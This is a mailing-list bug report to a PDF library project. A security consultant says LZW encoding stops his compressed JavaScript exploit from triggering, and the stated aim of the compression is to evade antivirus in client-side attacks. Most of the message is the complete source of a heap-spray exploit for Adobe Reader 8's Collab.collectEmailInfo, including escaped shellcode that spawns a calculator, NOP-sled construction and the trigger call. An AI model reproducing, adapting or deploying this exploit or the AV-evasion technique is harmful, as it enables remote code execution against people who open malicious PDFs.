[pdf-devel] LZWEncode Bug Report

[David Stroud]

Hey there,

After chatting with jemarch in the irc channel, I was advised to submit a bug report of this issue I've been having.

I'm trying to compress _javascript_ inside PDFs for use in avoiding AVs in client side attacks. To begin with I was just encoding this single line in pdf-filter:

app.alert({cMsg: 'Hello there', cTitle: 'Testing PDF _javascript_', nIcon: 3});

and it worked fine with lzw encoding, rle, ahex and flate (singularly or stacked together).

After that, I moved on to the actual exploit itself, which is the collectemailinfo heap spray. Here is the code with a payload that spawns calculator:

var MemArray = new Array();

function function1(var1, var2){

while (var1.length * 2 < var2){

var1 += var1;

}

var1 = var1.substring(0, var2 / 2);

return var1;

}

function HeapSpray(input){

var Sprayval = 0x0c0c0c0c;

Shellcode = unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u2e63%u7865%u0065");

if (input == 1){

Sprayval = 0x30303030;

}

var const01 = 0x400000

var ScLength = Shellcode.length * 2;

var noplength = const01 - (ScLength + 0x38);

var nop = unescape("%u9090%u9090");

nop = function1(nop, noplength);

var arraysize = (Sprayval - const01) / const01;

for (var a = 0; a < arraysize; a ++){

MemArray[a] = nop + Shellcode;

}

}

function Sploit(){

HeapSpray(0);

var csled = unescape("%u0c0c%u0c0c");

while (csled.length < 44952) csled += csled;

this .collabStore = Collab.collectEmailInfo({subj : "", msg : csled});

}

Sploit();

The above code, when compressed with rle, flate and ahex (singularly or stacked), works with no problems (on adobe reader 8). However, as soon as I introduce lzw into it, either on it's own or stacked with one or all the others, the exploit doesn't trigger. I tried the code without any whitespace as well, but no luck there either.

Hope this helps! Other than that it's been an amazing program so far =)

Cheers

--
David Stroud
Security Consultant
Perspective Risk
Email: address@hidden